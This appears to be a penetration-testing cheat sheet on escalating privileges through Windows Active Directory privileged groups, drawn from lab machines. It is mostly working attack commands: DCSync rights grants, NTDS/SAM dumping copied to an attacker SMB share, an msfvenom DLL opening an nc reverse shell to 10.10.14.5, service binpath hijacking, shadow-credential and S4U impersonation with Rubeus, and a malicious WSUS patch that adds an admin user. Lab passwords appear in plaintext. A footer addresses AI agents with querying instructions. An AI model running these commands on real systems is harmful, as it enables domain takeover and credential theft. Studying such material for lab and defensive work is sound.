# Privileged Groups ## Account Operators The members of account operators are allowed to create accounts as well as modify non-admin groups. ```powershell Get-NetGroupMember -Identity "Account Operators" -Recurse ``` In this machine I took over of a **svc-alfresco** with belongs to **Account Operators** and other nested groups including Exchange Windows Permissions that have WriteNACL permissions against the domain. That means that I can add svc-alfresco as member of Exchange Windows Permission and then perform the DCSync attack to dump the NTDS.dit. ```powershell Import-Module .\\PowerView.ps1 Add-ADGroupMember -Identity "EXCHANGE WINDOWS PERMISSIONS" -Members svc-alfresco; $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force; $Cred = New-Object System.Management.Automation.PSCredential('HTB\\svc-alfresco', $SecPassword); Add-DomainObjectAcl -Credential $Cred -TargetIdentity "HTB.LOCAL\\Domain Admins" -Identity 'svc-alfresco' -Rights DCSync ``` **Example**: [**Forest**](https://www.notion.so/Forest-1443519b5b5c803ba2efddaf2aacce25?pvs=21) ## Backup Operators [SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug at master · giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug) To convert the script to acceptable windows format run: *unix2dos diskshadow\.txt* ```jsx #FindWriteable directories accesschk.exe -w -s -u C:\\ ``` ```bash set context persistent nowriters set metadata c:\\windows\\system32\\spool\\drivers\\color\\example.cab set verbose on begin backup add volume c: alias mydrive create expose %mydrive% w: end backup ``` To leverage these privileges locally, the following steps are employed: ```bash #Import necessary libraries: Import-Module .\\SeBackupPrivilegeUtils.dll Import-Module .\\SeBackupPrivilegeCmdLets.dll #Enable the seBackupPrivilege Set-SeBackupPrivilege Get-SeBackupPrivilege diskshadow /s diskshadow.txt Copy-FileSeBackupPrivilege w:\\windows\\NTDS\\ntds.dit ntds.dit -Overwrite reg save HKLM\\SAM SAM reg save HKLM\\SYSTEM SYSTEM ``` To dump the NTDS ```bash impacket-secretsdump -sam SAM -ntds ntds.dit -system SYSTEM local ``` Alternative ```jsx *Evil-WinRM* PS C:\\programdata\\temp> robocopy /b C:\\users\\administrator\\desktop C:\\programdata\\temp ``` ### **Dump SAM/SYSTEM/SECURITY** files from registry hive Tool: ### Dump Registry hives with BackupOperatorToDa 
PS C:\> .\BackupOperatorToDA.exe -t \\lusdc.lustrous.vl -u tony.ward -p U_cPVQqEI50i1X -d lustrous.vl -o \\10.8.5.48\smbfolder\
### Dump Registry hives with Impacket ```sh #Dump one at time. impacket-reg lustrous.vl/Tony.Ward:'U_cPVQqEI50i1X'@10.10.173.213 save -keyName 'HKLM\SAM' -o '\\10.8.5.48\smbfolder' 2>/dev/null impacket-reg lustrous.vl/Tony.Ward:'U_cPVQqEI50i1X'@10.10.173.213 save -keyName 'HKLM\SYSTEM' -o '\\10.8.5.48\smbfolder' 2>/dev/null impacket-reg lustrous.vl/Tony.Ward:'U_cPVQqEI50i1X'@10.10.173.213 save -keyName 'HKLM\SECURITY' -o '\\10.8.5.48\smbfolder' 2>/dev/null #Dump All impacket-reg lustrous.vl/Tony.Ward:'U_cPVQqEI50i1X'@10.10.173.213 backup -o '\\10.8.5.48\smbfolder' 2>/dev/null ``` ## **AD Recycle Bin** ``` Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties * ``` Example: [Cascade](https://www.notion.so/Cascade-1493519b5b5c8077b7baf041fd32797e?pvs=21) ## **DNSAdmin** The penetration tester discovered that the **user ryan** was a member of the **DnsAdmins** group, granting permissions to configure DNS Server settings. This misconfiguration was exploited to escalate privileges to **Domain Administrator**. **Steps Taken:** 1. **Payload Creation** A malicious DLL was generated using `msfvenom` to establish a reverse shell: ```bash msfvenom -p windows/x64/exec cmd='\\\\10.10.14.5\\smbfolder\\nc.exe -e cmd.exe 10.10.14.5 1234' -f dll -o shell.dll ``` 2. **DLL Injection** The malicious DLL was injected into the DNS Server configuration: ```powershell *Evil-WinRM* PS C:\\Users\\ryan\\Documents> dnscmd Resolute /config /serverlevelplugindll \\\\10.10.14.5\\smbfolder\\shell.dll ``` 3. **Service Restart** Restarting the DNS service triggered the payload execution: ```powershell cmd /c "sc.exe stop dns"; cmd /c "sc.exe start dns" ``` 4. **Privilege Escalation** The payload executed successfully, granting **Domain Administrator privileges**. **Evidence:**
Example: [Resolute](https://www.notion.so/Resolute-1463519b5b5c80ca88f3d8072b6ba2d4?pvs=21) ## Servers Operators ```bash #Find Services full controll reg query "HKLM\\SYSTEM\\CurrentControlSet\\Services" /s | findstr /i "ImagePath" | findstr /v "C:\\Windows\\" #Check Permisiosn Get-Acl 'C:\\Program Files (x86)\\Microsoft SQL Server\\90\\Shared\\sqlbrowser.exe' | Format-List icacls 'C:\\Program Files (x86)\\Microsoft SQL Server\\90\\Shared\\sqlbrowser.exe' C:\\htb> sc query sqlbrowser C:\\htb> sc config binpath='COMMAND-HERE' C:\\htb> sc stop sqlbrowser C:\\htb> sc start sqlbrowser ``` 
#Enable Service
#If you get: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it. (START_TYPE : 4 DISABLED)
C:\\htb> cmd /c sc config sqlbrowser start=auto
Example: [MultiMaster](https://www.notion.so/MultiMaster-14a3519b5b5c800681b3d0fd2bd67a42?pvs=21) ### Account Operators `Account Operators`, Members can modify non-protected accounts and groups in the domain. ```powershell PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> $SecPassword = ConvertTo-SecureString 'Welcome123!' -AsPlainText -Force PS C:\Tools> New-DomainUser -Domain domain.local -SamAccountName Intrusionz3r0 -AccountPassword $SecPassword ``` ## Enterprise Key Admins `Enterprise Key Admins`, Members have the ability to write to the “msds-KeyCredentialLink” property on a user or computer. Writing to this property allows an attacker to create “Shadow Credentials” on the object and authenticate as the principal using kerberos PKINIT. #### Case 1 : User has GenericAll over Enterprise Key Admins. ```powershell #Get TGT ticket PS C:\Tools> .\Rubeus.exe asktgt /user:sentinal /password:sentinal /ptt #Add yourself or any user to the Enterprise Key Admins PS C:\Tools> Add-DomainGroupMember -identity 'Enterprise Key Admins' -Members 'DEV\sentinal' -Domain inlanefreight.ad -Verbose #Adding Credentials on the msDS-KeyCredentialLink Attribute PS C:\Tools> .\Whisker.exe add /target:DC01$ /domain:inlanefreight.ad #Requesting TGT for DC01$ and retrieving NT hash PS C:\Tools> .\Rubeus.exe asktgt /user:DC01$ /certificate:MIIJuAIBA" /domain:inlanefreight.ad /dc:DC01.INLANEFREIGHT.AD /getcredentials /show #Performing S4U2self Request to Impersonate Administrator PS C:\Tools> .\Rubeus.exe s4u /dc:DC01.inlanefreight.ad /ticket:doIGbDCCB /impersonateuser:administrator@inlanefreight.ad /ptt /self /service:host/DC01.inlanefreight.ad /altservice:cifs/DC01.inlanefreight.ad ``` ### WSU Administrator {% embed url="" %} {% embed url="" %} ```powershell #Create the malicious patch PS C:\> SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add && net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo" #Aprove the malicious Patch PS C:\> SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group" #Check the Patch status PS C:\> SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local” #Wait a couple minutes ``` * Default `Administrators`, `Domain Admins` and `Enterprise Admins` "super" groups. * `Server Operators`, Members are allowed to log onto DCs locally and can modify services, access SMB shares, and backup files. * `Backup Operators`, Members are allowed to log onto DCs locally and should be considered Domain Admins. They can make shadow copies of the SAM/NTDS database, read the registry remotely, and access the file system on the DC via SMB. This group is sometimes added to the local Backup Operators group on non-DCs. * `Print Operators`, Members are allowed to logon to DCs locally and "trick" Windows into loading a malicious driver. * `Hyper-V Administrators`, If there are virtual DCs, any virtualization admins, such as members of Hyper-V Administrators, should be considered Domain Admins. * `Account Operators`, Members can modify non-protected accounts and groups in the domain. * `Remote Desktop Users`, Members are not given any useful permissions by default but are often granted additional rights such as Allow Login Through Remote Desktop Services and can move laterally using the RDP protocol. * `Remote Management Users`, Members are allowed to logon to DCs with PSRemoting (This group is sometimes added to the local remote management group on non-DCs). * `Group Policy Creator Owners`, Members can create new GPOs but would need to be delegated additional permissions to link GPOs to a container such as a domain or OU. * `Schema Admins`, Members can modify the Active Directory schema structure and can backdoor any to-be-created Group/GPO by adding a compromised account to the default object ACL. * `DNS Admins`, Members have the ability to load a DLL on a DC but do not have the necessary permissions to restart the DNS server. They can load a malicious DLL and wait for a reboot as a persistence mechanism. Loading a DLL will often result in the service crashing. A more reliable way to exploit this group is to create a WPAD record. * `Enterprise Key Admins`, Members have the ability to write to the “msds-KeyCredentialLink” property on a user or computer. Writing to this property allows an attacker to create “Shadow Credentials” on the object and authenticate as the principal using kerberos PKINIT. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0/windows-penetration-testing/privileged-groups.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.